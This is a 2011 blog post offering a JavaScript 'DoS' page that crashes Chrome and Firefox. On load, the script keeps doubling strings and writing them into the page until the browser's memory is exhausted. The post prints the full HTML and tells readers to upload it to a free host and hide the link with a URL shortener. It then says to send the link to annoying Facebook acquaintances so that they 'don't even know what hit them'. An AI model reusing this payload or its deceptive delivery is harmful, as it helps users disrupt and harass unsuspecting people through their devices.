Wednesday 7 December 2011


Crash any web browser !!!

Hack them all
Once in a while you come across people who just won't stop wasting your time on Facebook.
They just do not have anything else to do than to piss you off. In those time, you wish you could just disable that person's internet connection ! While this post won't show you how to do this, it will surely show you how you can piss off your friends by crashing their browsers.

The reason why the author call this a DoS is above my comprehension xD. It is just some javascipt code that crash the browser because the javascript code messes up with the memory of the browser. Still IT DOES CRASH THE BROWSER.
Affected Platforms: Windows and Unix

Affected Browsers: Chrome and Firefox

Tested on: Chrome v15 and Firefox v7
 How to make it work ?
This exploit can be handy, so you may want it to be ready and and ur disposal.
I recommend uploading the code on a free web host.
<html>
<title>DoS</title>

<head>
<script>

function Lox()
 {

  
    var longunistring1 = unescape("%u4141%u4141");

    var longunistring2 = unescape("%u4242%u4242");
    var longunistring3 = unescape("%u4343%u4343");

    var longunistring4 = unescape("%u4444%u4444");
      

    for(i=0; i <= 100 ; ++i)
 {

        longunistring1+=longunistring1;
        longunistring2+=longunistring2;

        longunistring3+=longunistring3;
        longunistring4+=longunistring4;

        document.write(longunistring1);
        document.write(longunistring2);

        document.write(longunistring3);
        document.write(longunistring4);

    }   
    document.write(longunistring1);

    document.write(longunistring2);
    document.write(longunistring3);

    document.write(longunistring4);
}

</script>
</head>

<body onLoad="Lox()">
</body>

</html>

(You have to save the code as an html file first)
Shorten the url of your free web host using goo.gl service or any other.
Just send them the url and watch them dissapear xD
Total Fun and they don't even know what hit them.
Happy Crashing.

No comments:

Post a Comment